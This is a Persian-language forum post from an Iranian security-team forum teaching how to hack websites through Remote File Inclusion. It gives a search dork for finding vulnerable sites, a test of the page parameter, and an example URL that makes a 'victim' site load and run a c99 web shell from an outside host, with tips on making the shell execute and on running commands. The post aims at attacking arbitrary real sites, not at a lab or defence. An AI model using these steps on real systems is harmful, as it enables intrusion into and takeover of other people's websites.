رفتن به مطلب
انجمن تیم امنیتی گارد ایران

آموزش هک سایت با باگ RFI


amir_HK
 اشتراک گذاری

ارسال های توصیه شده

          به نام خدا

 

با سلام خدمت تمامی دوستان

 در این تاپیک می خوام باگ RFI به صورت کامل و دقیق آموزش بدم

آموزش در 3 مرحله صورت می گیره

 اسپم ممنوع

 سوال+نظر+پیشنهاد در پ.خ 

 

در مورد باگ RFI :

باگ RFI مخفف Remote File Inclusion است و مثل سایر باگ ها در برنامه نویسی غلط به وجود میاد.

باگ RFI در بی دقتی در نوشتن توابع به وجود میاد.

مانند تابع Include و Require

با استفاده از این باگ کارهای زیادی میتوان انجام داد از جمله : تبدیل آن به اجرای دستورات از راه دور با استفاده از گزارش های Apache ، خواندن فایل های مهم سیستمی با فایل های config Rfi.

 
مرحله اول:شناسایی و پیدا کردن باگ RFI
 
خب در این مرحله همونطور که می دونید باید سایتی رو که باگ RFI داره پیدا کنیم.

دقت داشته باشید که برای تست این باگ،سایت باید Navigation (جهت یابی) همانند زیر را داشته باشد:

1.

www.target.com/index.php?page=Anything

خب رایج ترین دورک باگ RFI این هست:

"inurl=index.php?page=" 

و به این ترتیب تمامی سایت هایی که عبارت بالا را در آخر خود دارد بارگذاری می شوند.
همچنین لیستی از بهترین دورک های این باگ برای سهولت کار شما عزیزان پیوست میشود.

رمز: guardiran.org

  

مرحله دوم:تست باگ RFI روی سایت

 

 

در این مرحله یاد میگیرید که باگ RFI رو روی سایت تست کنید و مطمئن بشید که سایت باگ داره.

این کار هم بسیار راحت هست.شما باید در این عبارت:     

www.target.com/index.php?page=news

هرچه جلوی علامت مساوی هست رو پاک کنید و بنویسید www.google.com

خب اگر سایت گوگل در وسط وب سایت قربانی به نمایش درآمد یعنی اینکه وب سایت قربانی به این حمله آسیب پذیر است ولی اگر سایت گوگل بالا نیامد شما باید هدف دیگری رو جست و جو کنید.

این هم از مرحله دوم  cool.png 

 

مرحله سوم:Hack سایت با باگ RFI

 

 

در دو مرحله بالا یاد گرفتید که چطور یک سایت آسیب پذیر به این باگ پیدا کنید و اون رو تست کنید

باید بگم این مرحله از دو مرحله قبل هم آسون تره  13.gif 

ما در مرحله دوم گفتیم که برای تست سایت،هرچه جلوی علامت مساوی هست پاک کنید و  بنویسید www.google.com

خب وقتی که مطمئن شدید سایت باگ داره، به جای www.google.com لینک مستقیم شل خودتون رو قرار بدید.

خواهید دید که شل شما به روی وب سایت قربانی اجرا می شود  rolleyes.gif 

مثال:

www.target.com/index.php?page=http://h1.ripway.com/mydomin/c99.txt?
 

excl.png  نکته 1: حتما علامت ؟ را در اخر ادرس شل قرار بدید وگرنه شل اجرا نمی شود 

excl.png  نکته 2: دقت داشته باشید که فرمت شل فقط باید txt باشد

 

همچنین شما می تونید با دستور command دستورات خود رو به روی سایت اجرا کنید.

مثال:

www.target.com/index.php?page=command

     

 

 لطفا از این پست تشکر کنید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...